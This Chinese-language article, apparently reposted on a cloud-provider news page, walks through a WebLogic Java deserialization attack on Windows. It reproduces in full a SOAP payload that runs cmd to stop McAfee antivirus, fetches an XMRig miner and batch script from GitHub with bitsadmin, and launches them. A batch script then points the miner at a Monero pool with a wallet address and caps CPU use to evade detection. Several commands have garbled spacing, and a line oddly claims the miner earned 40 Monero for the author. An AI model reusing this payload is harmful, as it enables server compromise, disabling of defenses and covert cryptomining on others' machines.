溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何利用Java反序列化漏洞進(jìn)行在Windows上的實(shí)驗(yàn)

發(fā)布時(shí)間:2021-11-11 11:47:03 來源:億速云 閱讀:160 作者:柒染 欄目:編程語言

這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)碛嘘P(guān)如何利用Java反序列化漏洞進(jìn)行在Windows上的實(shí)驗(yàn),文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

最近,安全社區(qū)中有很多人都在討論如何利用Java反序列化漏洞來攻擊類似Apache、SOLR和WebLogic之類的系統(tǒng)。不說廢話,我們直接進(jìn)入正題。目前絕大多數(shù)的此類攻擊針對(duì)的都是Linux/Unix系統(tǒng),但是我近期發(fā)現(xiàn)了一種針對(duì)Windows系統(tǒng)的攻擊方法。

攻擊代碼如下:

<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContextxmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <objectclass="java.lang.ProcessBuilder">
          <arrayclass="java.lang.String" length="3" >
            <void index="0">
              <string>cmd</string>
            </void>
            <void index="1">
              <string>/c</string>
            </void>
            <void index="2">
              <string>net stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;</string>
            </void>
          </array>
          <voidmethod="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

實(shí)際的Payload分析

關(guān)閉McAfee反病毒軟件(我不明白社區(qū)中的這種技術(shù)為啥只關(guān)掉McAfee…):

netstop "McAfee McShield;
netstop mcafeeframework;

使用bitsadmin從GitHub下載加密貨幣挖礦程序和一個(gè)batch腳本文件:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";
bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;
dirxmrig*;
xmrig.bat;
tasklist;

Batch腳本文件代碼如下:

taskkill/im /f xmrig.exe /t
netstop "McAfee McShield"
netstop mcafeeframework
xmrig.exe-o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先,上述代碼會(huì)終止其他xmrig進(jìn)程(可能是為了防止資源競爭)。接下來,它會(huì)關(guān)閉McAfee。然后便會(huì)開啟挖礦程序,并跟monerohash.com礦池(端口3333)進(jìn)行連接。它只會(huì)占用大約50%的CPU資源,估計(jì)是為了避免被檢測到吧。

目前為止,這個(gè)挖礦程序的計(jì)算能力只能實(shí)現(xiàn)350哈希每秒,并為我挖到了40個(gè)門羅幣(價(jià)值約為7000美元)。

上述就是小編為大家分享的如何利用Java反序列化漏洞進(jìn)行在Windows上的實(shí)驗(yàn)了,如果剛好有類似的疑惑,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI